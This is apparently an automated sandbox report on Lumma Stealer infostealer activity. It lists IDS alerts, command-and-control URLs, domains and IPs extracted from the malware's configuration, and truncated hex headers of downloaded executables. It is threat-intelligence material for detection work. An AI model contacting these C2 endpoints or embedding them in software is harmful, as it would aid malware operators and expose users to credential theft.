Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49919 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50043 -> 188.114.97.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:58627 -> 188.114.97.3:443
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php
Source: Malware configuration extractor URLs: fadehairucw.store
Source: Malware configuration extractor URLs: thumbystriw.store
Source: Malware configuration extractor URLs: scriptyprefej.store
Source: Malware configuration extractor URLs: founpiuer.store
Source: Malware configuration extractor URLs: crisiwarny.store
Source: Malware configuration extractor URLs: presticitpo.store
Source: Malware configuration extractor URLs: navygenerayk.store
Source: Malware configuration extractor URLs: necklacedmny.store
Source: Malware configuration extractor IPs: 185.215.113.43
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 33
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:15:10 GMTContent-Type: application/octet-streamContent-Length: 2809344Last-Modified: Thu, 31 Oct 2024 02:58:51 GMTConnection: keep-aliveETag: "6722f26b-2ade00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2b 00 00 04 00 00 26 04 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 75 63 78 67 76 69 6e 73 00 80 2a 00 00 a0 00 00 00 7c 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 75 6c 76 74 74 61 6c 00 20 00 00 00 20 2b 00 00 06 00 00 00 b6 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2b 00 00 22 00 00 00 bc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:15:14 GMTContent-Type: application/octet-streamContent-Length: 1873920Last-Modified: Thu, 31 Oct 2024 03:03:32 GMTConnection: keep-aliveETag: "6722f384-1c9800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 40 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4a 00 00 04 00 00 90 ae 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 d8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 27 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 27 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d8 04 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2a 00 00 b0 06 00 00 02 00 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 6c 65 67 6c 70 6a 70 00 80 19 00 00 b0 30 00 00 7c 19 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 7a 6e 63 62 64 65 77 00 10 00 00 00 30 4a 00 00 04 00 00 00 72 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 4a 00 00 22 00 00 00 76 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:16:08 GMTContent-Type: application/octet-streamContent-Length: 3003904Last-Modified: Thu, 31 Oct 2024 03:03:12 GMTConnection: keep-aliveETag: "6722f370-2dd600"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 e0 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 31 00 00 04 00 00 aa 22 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 7e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 40 03 00 00 00 90 05 00 00 04 00 00 00 8e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 92 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 70 66 62 6f 79 68 62 6c 00 20 2b 00 00 b0 05 00 00 1a 2b 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 69 72 64 66 61 75 6e 00 10 00 00 00 d0 30 00 00 06 00 00 00 ae 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 e0 30 00 00 22 00 00 00 b4 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:16:14 GMTContent-Type: application/octet-streamContent-Length: 2085888Last-Modified: Thu, 31 Oct 2024 03:03:25 GMTConnection: keep-aliveETag: "6722f37d-1fd400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 30 71 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 71 00 00 04 00 00 b8 9b 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 29 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 73 69 73 6f 71 6f 69 00 30 19 00 00 f0 57 00 00 24 19 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 67 78 69 71 63 74 6e 00 10 00 00 00 20 71 00 00 04 00 00 00 ae 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 30 71 00 00 22 00 00 00 b2 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:16:21 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Thu, 31 Oct 2024 02:58:24 GMTConnection: keep-aliveETag: "6722f250-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 48 f2 22 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 12 c3 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:16:27 GMTContent-Type: application/octet-streamContent-Length: 888832Last-Modified: Sun, 27 Oct 2024 06:45:44 GMTConnection: keep-aliveETag: "671de198-d9000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 90 6c 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 2e 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 ab 02 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 2e 00 ec 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8a cf 01 00 00 10 00 00 00 d0 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 08 d1 00 00 00 e0 01 00 00 d2 00 00 00 d4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c bd 2b 00 00 c0 02 00 00 9e 0a 00 00 a6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 3e 4b 00 00 00 80 2e 00 00 4c 00 00 00 44 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 31 Oct 2024 03:16:28 GMTContent-Type: application/octet-streamContent-Length: 2809344Last-Modified: Thu, 31 Oct 2024 02:58:51 GMTConnection: keep-aliveETag: "6722f26b-2ade00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2b 00 00 04 00 00 26 04 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 75 63 78 67 76 69 6e 73 00 80 2a 00 00 a0 00 00 00 7c 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6e 75 6c 76 74 74 61 6c 00 20 00 00 00 20 2b 00 00 06 00 00 00 b6 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2b 00 00 22 00 00 00 bc 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 